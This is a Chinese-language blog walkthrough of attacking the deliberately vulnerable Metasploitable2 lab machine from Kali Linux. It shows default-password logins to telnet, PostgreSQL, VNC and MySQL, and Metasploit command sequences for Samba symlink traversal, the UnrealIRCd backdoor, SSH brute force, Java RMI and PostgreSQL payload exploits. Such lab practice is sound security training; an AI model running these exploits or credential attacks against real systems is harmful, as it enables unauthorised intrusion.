zoukankan      html  css  js  c++  java
  • Metasploitable2 靶机漏洞

    演示环境

    1、靶机: Metasploitable2-Linux

         IP:192.168.184.130

    2、攻击机:Kali-Linux-2021.02-amd64

         IP:192.168.184.128

    扫描端口

    系统弱密码登录

    1、在kali上执行命令行telnet 192.168.184.130

    2、Login和password都输入msfadmin

    3、登录成功,进入系统

    4、测试如下:

    PostgreSQL弱密码登录

    1、在Kali上执行psql -h 192.168.184.130 –U postgres

    2、输入密码:postgres

    3、登录成功,进入postgresql系统

    VNC弱密码登录

    1、在kali图形界面的终端中执行vncviewer 192.168.184.130

    2、输入密码 password

    3、登录成功,进入系统

    MySQL弱密码登录

    1、在kali上执行mysql –h 192.168.184.130 –u root

    2、登录成功,进入MySQL系统

    Samba sysmlink 默认配置目录遍历漏洞

    CVE-2010-0926

    端口: 445
    利用模块:

    auxiliary/admin/smb/samba_symlink_traversal
    set SMBSHARE tmp //设置SAM可写文件

     

    UnrealIRCd Backdoor(ircd)

    端口: 6667
    利用模块: exploit/unix/irc/unreal_ircd_3281_backdoor

     msf6 > use exploit/unix/irc/unreal_ircd_3281_backdoor 调试模块
    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set 查看设置信息
    
    
    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 192.168.184.130
    rhosts => 192.168.184.130 设置攻击目标IP地址
    
    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run 执行
    
    [-] 192.168.184.130:6667 - Exploit failed: A payload has not been selected.
    发现没有配置默认的payload
    [*] Exploit completed, but no session was created.

    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads 查看可以使用的payload
    
    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/bind_perl
    payload => cmd/unix/bind_perl
    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

     

    ssh用户名密码扫描

    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > search ssh_login 查找模块
    
    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > use auxiliary/scanner/ssh/ssh_login
    msf6 auxiliary(scanner/ssh/ssh_login) > set
    
    msf6 auxiliary(scanner/ssh/ssh_login) > set username root 设置暴力破解的用户名
    username => root
    msf6 auxiliary(scanner/ssh/ssh_login) > set userpass_file /usr/share/wordlists/metasploit/root_userpass.txt 设置暴力破解文件
    userpass => file /usr/share/worilsts/metasploit/root_userpass.txt
    msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.184.130 设置攻击目标的IP地址
    rhosts => 192.168.184.130

     

    msf6 auxiliary(scanner/ssh/ssh_login) > run 执行,得出的密码是root

     利用服务器不安全默认配置java代码

    msf6 auxiliary(scanner/ssh/ssh_login) > search java_rmi_server 查询模块
    msf6 exploit(multi/misc/java_rmi_server) > set rhosts 192.168.184.130 设置执行目标IP地址
    rhosts => 192.168.184.130
    msf6 exploit(multi/misc/java_rmi_server) > exploit 执行

     

      

      

    Postgres共享库代码任意执行

    在一些默认的Linux安装的PostgreSQL,postgres服务账户可以写到/tmp目录,还有共享库,允许任意执行代码

    msf6 exploit(multi/misc/java_rmi_server) > search PostgreSQL 查找相应的模块
    
    msf6 exploit(multi/misc/java_rmi_server) > use exploit/linux/postgres/postgres_payload 调用模块
    [*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
    msf6 exploit(linux/postgres/postgres_payload) > set 查看设置
    
    msf6 exploit(linux/postgres/postgres_payload) > set rhosts 192.168.184.130 设置攻击目标IP地址
    rhosts => 192.168.184.130
    msf6 exploit(linux/postgres/postgres_payload) > run 执行

     

    作者:拾瑾
    个性签名:愿历经千帆,归来仍少年.
    本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接,否则保留追究法律责任的权利.
  • 相关阅读:
    小程序动态修改页面标题setNavigationBarTitle
    webapi发布在iis之后报错Http 403.14 error
    vue调用子组件方法时,参数传不过去
    Echarts中X轴坐标太密集,分段显示
    使用echarts时,鼠标首次移入屏幕会闪动,全屏会出现滚动条
    js关于数组的操作(合并数组、添加数组、循环等)
    在vue项目中使用echarts
    npm i安装命令中的-g -D -S的区别
    ArcGIS api for JS 实现三维飞行漫游功能
    Vue通过EventBus实现兄弟组件间通信
  • 原文地址:https://www.cnblogs.com/ayoung/p/15186328.html
Copyright © 2011-2022 走看看